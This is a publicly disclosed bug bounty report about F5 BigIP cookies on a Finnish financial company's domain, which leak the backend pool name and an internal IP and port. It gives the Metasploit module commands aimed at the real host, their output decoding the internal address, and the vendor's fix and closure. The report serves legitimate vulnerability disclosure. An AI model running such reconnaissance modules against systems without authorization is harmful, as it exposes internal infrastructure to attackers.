F5 BigIP Backend Cookie Disclosure
State Resolved (Closed)
Disclosed publicly 2018-09-10T01:21:20.723Z
Reported To
Weakness Information Disclosure
Bounty $50
Collapse

Summary by lovepakistan

Issue

The reporter found that the f5 Big-IP cookies potentially reveal BigIP pool name, backend's IP address and port, routed domain.

Fix

There is an option in Big-IP to fix this. Just click, apply and you are done.

Reasoning

The issue is not critical,but it was an easy fix. Note: we will apply this to all domains and no further reports on this for other domains will be accepted never ever.

Timeline
submitted a report to LocalTapiola .
2018-07-21T09:42:24.281Z

Basic report information

Summary:
The Same issue was reported on www.myynti.lahitapiolarahoitus.fi by another reporter. It was fixed for that. But when I test the same issue on lahitapiolarahoitus.fi. It is also causing leakage of information.

Description:
I just identify F5 BigIP load balancers and leaks backend information (pool name, backend's IP address and port, routed domain) through cookies inserted by the BigIP system.

Browsers / Apps Verified In:

  • MetaSploit Framework

Steps To Reproduce:

MetaSploit commands:

  1. use auxiliary/gather/f5_bigip_cookie_disclosure
  2. SET RHOST lahitapiolarahoitus.fi
  3. run

OUTPUT:
[*] Starting request /
[+] F5 BigIP load balancing cookie "BIGipServerltr-prod_pool = 224700608.20480.0000" found
[+] Load balancing pool name "ltr-prod_pool" found
[+] Backend 192.168.100.13:80 found
[*] Auxiliary module execution completed

Additional material

Related Report: #330716
Refer to Cap2.JPG (F322966) as it is Fixed.

References:

https://www.rapid7.com/db/modules/auxiliary/gather/f5_bigip_cookie_disclosure
https://support.f5.com/csp/article/K14784%3Fsr%3D45997495
http://www.systemadvise.com/2016/11/f5-big-ip-cookie-remote-information.html

Impact

Attacker can leaks back-end information (pool name, backend's IP address and port, routed domain) through cookies inserted by the BigIP system.

Regards,
Frans

localtapiola-thomas Activities::Comment
2018-07-21T10:12:11.071Z
Thanks a lot for reporting this potential issue back to us. LocalTapiola takes security very seriously and would appreciate if you would not share any information about this report until we have determined whether this is a bug and what any potential impact (or fix) will be. Our security team will take a look at this issue as soon as possible. We aim to respond to your report as soon as possible, but due to the complexity of the systems, triaging many times can take a long time. We prioritize issues - reports containing trivial issues with limited (or no) business impact and badly written reports with insufficient information on how to reproduce the issue receive a lower priority. Please do not request updates for at least 20 days into the process. Once triaged and verified, bounty decisions are made 1-2 times per month. *Note: if we frequently dismiss your reports, make sure you have read our policy and stay in scope and that you know how to write good reports - https://support.hackerone.com/hc/en-us/articles/211538803-Step-by-Step-How-to-write-a-good-vulnerability-report and http://blog.bugcrowd.com/advice-for-writing-a-great-vulnerability-report/. Also, our policy contains a lot of information on what is relevant and what is not.*


Activities::BountyAwarded
2018-07-21T10:12:41.074Z


lovepakistan Activities::Comment
2018-08-24T09:47:01.627Z
Please do have a look !


lovepakistan Activities::Comment
2018-09-05T19:38:55.569Z
Any Updates?


localtapiola-thomas Activities::Comment
2018-09-05T23:26:28.366Z
You can retest to verify the fix.


lovepakistan Activities::Comment
2018-09-09T08:10:04.731Z
I am not be able to reproduce it. Thanks ! F344000


localtapiola-thomas Activities::BugResolved
2018-09-09T22:02:08.609Z
Closing as resolved.


localtapiola-thomas Activities::AgreedOnGoingPublic
2018-09-09T22:02:25.326Z
Full disclosure.


lovepakistan Activities::AgreedOnGoingPublic
2018-09-10T01:21:20.673Z


lovepakistan Activities::ReportBecamePublic
2018-09-10T01:21:20.754Z